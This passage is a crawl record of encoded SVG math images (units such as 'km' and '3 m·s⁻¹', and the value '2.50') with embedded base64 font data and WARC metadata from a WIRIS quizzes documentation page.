rial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2219.5%22%20y%3D%2215%22%3Ekm%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2222%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmtext%3Ekm%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2210.5%22%20y%3D%2215%22%3Ekm%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2256%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Em%3C%2Fmtext%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmsup%3E%3Cmtext%3Es%3C%2Fmtext%3E%3Cmrow%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1f9ece33f131ce1a9507d2cf938'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADxjdnQgDVUNBwAAAVgAAAA6Z2x5ZoPi2VsAAAGUAAAApWhlYWQQC2qxAAACPAAAADZoaGVhCGsXSAAAAnQAAAAkaG10eE2rRkcAAAKYAAAADGxvY2EAHTwYAAACpAAAABBtYXhwBT0FPgAAArQAAAAgbmFtZaBxlY4AAALUAAABn3Bvc3QB9wD6AAAEdAAAACBwcmVwa1uragAABJQAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACALciEv%2F%2FAAAAtyIS%2F%2F%2F%2FSt3wAAEAAAAAAAAAAAFUAywAgAEAAFYAKgJYAh4BDgEsAiwAWgGAAoAAoADUAIAAAAAAAAAAKwBVAIAAqwDVAQABKwAHAAAAAgBVAAADAAOrAAMABwAAMxEhESUhESFVAqv9qwIA%2FgADq%2FxVVQMAAAEAgAFVAOsBwAADABsYAbAEELEAA%2FSxAgP0sQUD9ACwBBCxAwb0MDETMxUjgGtrAcBrAAEAgAFVAtUBqwADADAYAbAEELEAA%2FawAzyxAgf1sAE8sQUD5gCxAAATELEABuWxAAETELABPLEDBfWwAjwTIRUhgAJV%2FasBq1YAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAwNSAFUBawCAA1YAgAAAAAAAAAAoAAAAWwAAAKUAAQAAAAMAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2215.5%22%20y%3D%2219%22%3Em%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f9ece33f131ce1a9507d2cf938%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2226.5%22%20y%3D%2219%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2234.5%22%20y%3D%2219%22%3Es%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f9ece33f131ce1a9507d2cf938%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2243.5%22%20y%3D%2212%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2251.5%22%20y%3D%2212%22%3E1%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2233%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E.%3C%2Fmo%3E%3Cmn%3E50%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1d9d4f495e875a2e075a1a4a6e1'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAbmhlYWQQC2qxAAAB%2FAAAADZoaGVhCGsXSAAAAjQAAAAkaG10eE2rRkcAAAJYAAAACGxvY2EAHTwYAAACYAAAAAxtYXhwBT0FPgAAAmwAAAAgbmFtZaBxlY4AAAKMAAABn3Bvc3QB9wD6AAAELAAAACBwcmVwa1uragAABEwAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAAC7%2F%2FwAAAC7%2F%2F%2F%2FTAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABACAAAACgAIAAAwAvGAGwBBCwA9SwAxCwAtSwAxCwADywAhCwATwAsAQQsAPUsAMQsAI8sAAQsAE8MDE3MxUjIICAgIAAAAABAAAAAQAA1XjOQV8PPPUAAwQA%2F%2F%2F%2F%2F9Y6E3P%2F%2F%2F%2F%2F1joTcwAA%2FyAEgAOrAAAACgACAAEAAAAAAAEAAAPo%2F2oAABdwAAD%2FtgSAAAEAAAAAAAAAAAAAAAAAAAACA1IAVQDIACAAAAAAAAAAKAAAAG4AAQAAAAIAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1d9d4f495e875a2e075a1a4a6e1%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2211.5%22%20y%3D%2216%22%3E.%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2216%22%3E50%3C%2Ftext%3E%3C%2Fsvg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9217359,"math_prob":0.90720236,"size":7559,"snap":"2019-43-2019-47","text_gpt3_token_len":1517,"char_repetition_ratio":0.14189279,"word_repetition_ratio":0.09025559,"special_character_ratio":0.20439212,"punctuation_ratio":0.116361074,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9928146,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T13:40:03Z\",\"WARC-Record-ID\":\"<urn:uuid:85787711-6c70-42af-8d4c-8add4af9f5eb>\",\"Content-Length\":\"153427\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0c717198-bf5a-4e9c-9d87-d964afe7e195>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ea9f242-61de-4285-b0e8-43a53427718b>\",\"WARC-IP-Address\":\"99.84.216.88\",\"WARC-Target-URI\":\"https://docs.wiris.com/en/quizzes/user_interface/validation/validation\",\"WARC-Payload-Digest\":\"sha1:UJCHMCG2H4K6JQCM4VDCMLZMSLOODE2G\",\"WARC-Block-Digest\":\"sha1:HZX7ZT3OUHD7IL3QFB7H7L5ROFCWHILE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987773711.75_warc_CC-MAIN-20191021120639-20191021144139-00306.warc.gz\"}"}